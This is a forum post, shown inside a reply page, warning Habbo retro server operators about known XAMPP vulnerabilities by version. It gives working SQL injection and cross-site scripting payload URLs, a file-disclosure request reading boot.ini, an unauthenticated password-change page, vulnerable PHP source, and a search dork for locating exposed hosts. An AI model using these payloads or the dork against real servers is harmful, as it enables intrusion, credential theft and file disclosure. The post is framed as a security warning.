Menu
Forums
All threads
Latest threads
New posts
Trending threads
New posts
Search forums
Trending
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Upgrades
Log in
Register
What's new
Search
Search
Search titles only
By:
All threads
Latest threads
New posts
Trending threads
New posts
Search forums
Menu
Log in
Register
Navigation
Install the app
Install
More options
Contact us
Close Menu
Forums
Server Development
Habbo Retros
Habbo Q&A
Using Xampp? Then read this!
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Message
<blockquote data-quote="TheNotorious" data-source="post: 395671" data-attributes="member: 52791"><p style="text-align: center">A lot of peoples made retro with Xampp.</p> <p style="text-align: center"></p> <p style="text-align: center">There are some Vulnerabilities contains Xampp.</p> <p style="text-align: center">I just wanna let you know.</p> <p style="text-align: center"></p> <p style="text-align: center">Okay, its fine if ur cms is non exploitable, or u fixed the exploits like xss, etc..</p> <p style="text-align: center"></p> <p style="text-align: center">Xampp 1.8.2 - SQL Exploit</p> <p style="text-align: center">[SPOILER="SQL Injection"][/SPOILER]</p><p>[SPOILER="SQL Injection"]</p><p><a href="http://127.0.0.1/xampp/cds.php?jahr=1967" target="_blank">http://127.0.0.1/xampp/cds.php?jahr=1967</a> AND</p><p>sleep(3)&interpret=1&titel=555-666-0606</p><p>[/SPOILER]</p><p style="text-align: center"></p> <p style="text-align: center">Xampp 1.7.7 - 'PHP_SELF' Variable Scripting Vulnerabilities</p> <p style="text-align: center">[SPOILER="1.7.7"][/SPOILER]</p><p>[SPOILER="1.7.7"]</p><p>An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.</p><p></p><p>These issues affect XAMPP 1.7.7 for Windows.</p><p></p><p><a href="http://www.example.com/security/xamppsecurity.php/" target="_blank">http://www.example.com/security/xamppsecurity.php/</a>"><script>alert(1)</script></p><p><a href="http://www.example.com/xampp/perlinfo.pl/" target="_blank">http://www.example.com/xampp/perlinfo.pl/</a>"><script>alert(1)</script></p><p><a href="http://www.example.com/xampp/cds.php/" target="_blank">http://www.example.com/xampp/cds.php/</a>"><script>alert(1)</script></p><p>[/SPOILER]</p><p style="text-align: center"></p> <p style="text-align: center">Xampp 1.7.4 - Cross-site Scripting.</p> <p style="text-align: center">[SPOILER="1.7.4"][/SPOILER]</p><p>[SPOILER="1.7.4"]</p><p>XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.</p><p></p><p>An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.</p><p></p><p>These issues affect XAMPP 1.7.4 for Windows and prior.</p><p></p><p><a href="http://www.example.com/xampp/ming.php?text=[xss]" target="_blank">http://www.example.com/xampp/ming.php?text=[xss]</a></p><p><a href="http://www.example.com/xampp/cds.php/[xss]" target="_blank">http://www.example.com/xampp/cds.php/[xss]</a></p><p>[/SPOILER]</p><p style="text-align: center"></p> <p style="text-align: center">And Xampp 1.7.2 got exploit called:</p> <p style="text-align: center">Change (root) user password.</p> <p style="text-align: center">[SPOILER="1.7.2"][/SPOILER]</p><p>[SPOILER="1.7.2"]</p><p>At the older versions of xampp "xamppsecurity.php" was allowed</p><p> only for localhost but at version 1.7.2 i accessible by all</p><p></p><p> <a href="http://example.com/security/xamppsecurity.php" target="_blank">http://example.com/security/xamppsecurity.php</a></p><p></p><p> And you can change the .htacces user & pass and the phpMyAdmin pass</p><p>[/SPOILER]</p><p></p><p style="text-align: center">Xampp 1.7.3</p> <p style="text-align: center">[SPOILER="1.7.3"][/SPOILER]</p><p>[SPOILER="1.7.3"]</p><p> File disclosure</p><p></p><p>XAMPP is vulnerable to a remote file disclosure attack.</p><p>The vulnerability exists within the web application supplied with XAMPP.</p><p></p><p><a href="http://[host]/xampp/showcode.php/c:boot.ini?showcode=1" target="_blank">http://[host]/xampp/showcode.php/c:boot.ini?showcode=1</a></p><p></p><p>showcode.php:</p><p><?php</p><p> echo '<br><br>';</p><p> if ($_REQUEST['showcode'] != 1) {</p><p> echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';</p><p> } else {</p><p> $file = file_get_contents(basename($_SERVER['PHP_SELF']));</p><p> echo "<h2>".$TEXT['global-sourcecode']."</h2>";</p><p> echo "<textarea cols='100' rows='10'>";</p><p> echo htmlspecialchars($file);</p><p> echo "</textarea>";</p><p> }</p><p>?></p><p></p><p>showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.</p><p>What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.</p><p>basename() parses the last element of that path using "/" as a delimiter.</p><p></p><p>Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter.</p><p>Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.</p><p></p><p>Cross Site Scripting (1.7.3)</p><p></p><p><a href="http://[host]/xampp/phonebook.php/" target="_blank">http://[host]/xampp/phonebook.php/</a>"><script>alert("XSS")</script></p><p><a href="http://[host]/xampp/biorhythm.php/" target="_blank">http://[host]/xampp/biorhythm.php/</a>"><script>alert("XSS")</script></p><p></p><p>It is interesting to see the same programming error lead to another security vulnerability.</p><p>Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms.</p><p>This can be exploited to perform Cross Site Scripting attacks.</p><p></p><p>biorhythm.php (line 75):</p><p><form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>"></p><p></p><p>dork: "inurl:xampp/biorhythm.php"</p><p>[/SPOILER]</p><p style="text-align: center"></p> <p style="text-align: center">At the least, use IIS.</p> <p style="text-align: center"></p> <p style="text-align: center">- DanielBlur</p></blockquote><p></p>
[QUOTE="TheNotorious, post: 395671, member: 52791"] [CENTER]A lot of peoples made retro with Xampp. There are some Vulnerabilities contains Xampp. I just wanna let you know. Okay, its fine if ur cms is non exploitable, or u fixed the exploits like xss, etc.. Xampp 1.8.2 - SQL Exploit [SPOILER="SQL Injection"][/SPOILER][/CENTER] [SPOILER="SQL Injection"] [URL]http://127.0.0.1/xampp/cds.php?jahr=1967[/URL] AND sleep(3)&interpret=1&titel=555-666-0606 [/SPOILER] [CENTER] Xampp 1.7.7 - 'PHP_SELF' Variable Scripting Vulnerabilities [SPOILER="1.7.7"][/SPOILER][/CENTER] [SPOILER="1.7.7"] An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. These issues affect XAMPP 1.7.7 for Windows. [URL]http://www.example.com/security/xamppsecurity.php/[/URL]"><script>alert(1)</script> [URL]http://www.example.com/xampp/perlinfo.pl/[/URL]"><script>alert(1)</script> [URL]http://www.example.com/xampp/cds.php/[/URL]"><script>alert(1)</script> [/SPOILER] [CENTER] Xampp 1.7.4 - Cross-site Scripting. [SPOILER="1.7.4"][/SPOILER][/CENTER] [SPOILER="1.7.4"] XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues affect XAMPP 1.7.4 for Windows and prior. [URL]http://www.example.com/xampp/ming.php?text=[xss][/URL] [URL]http://www.example.com/xampp/cds.php/[xss][/URL] [/SPOILER] [CENTER] And Xampp 1.7.2 got exploit called: Change (root) user password. [SPOILER="1.7.2"][/SPOILER][/CENTER] [SPOILER="1.7.2"] At the older versions of xampp "xamppsecurity.php" was allowed only for localhost but at version 1.7.2 i accessible by all [URL]http://example.com/security/xamppsecurity.php[/URL] And you can change the .htacces user & pass and the phpMyAdmin pass [/SPOILER] [CENTER]Xampp 1.7.3 [SPOILER="1.7.3"][/SPOILER][/CENTER] [SPOILER="1.7.3"] File disclosure XAMPP is vulnerable to a remote file disclosure attack. The vulnerability exists within the web application supplied with XAMPP. [URL]http://[host]/xampp/showcode.php/c:boot.ini?showcode=1[/URL] showcode.php: <?php echo '<br><br>'; if ($_REQUEST['showcode'] != 1) { echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>'; } else { $file = file_get_contents(basename($_SERVER['PHP_SELF'])); echo "<h2>".$TEXT['global-sourcecode']."</h2>"; echo "<textarea cols='100' rows='10'>"; echo htmlspecialchars($file); echo "</textarea>"; } ?> showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path. What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file. basename() parses the last element of that path using "/" as a delimiter. Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter. Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory. Cross Site Scripting (1.7.3) [URL]http://[host]/xampp/phonebook.php/[/URL]"><script>alert("XSS")</script> [URL]http://[host]/xampp/biorhythm.php/[/URL]"><script>alert("XSS")</script> It is interesting to see the same programming error lead to another security vulnerability. Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms. This can be exploited to perform Cross Site Scripting attacks. biorhythm.php (line 75): <form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>"> dork: "inurl:xampp/biorhythm.php" [/SPOILER] [CENTER] At the least, use IIS. - DanielBlur[/CENTER] [/QUOTE]
Insert quotes…
Verification
Post reply
Forums
Server Development
Habbo Retros
Habbo Q&A
Using Xampp? Then read this!
Top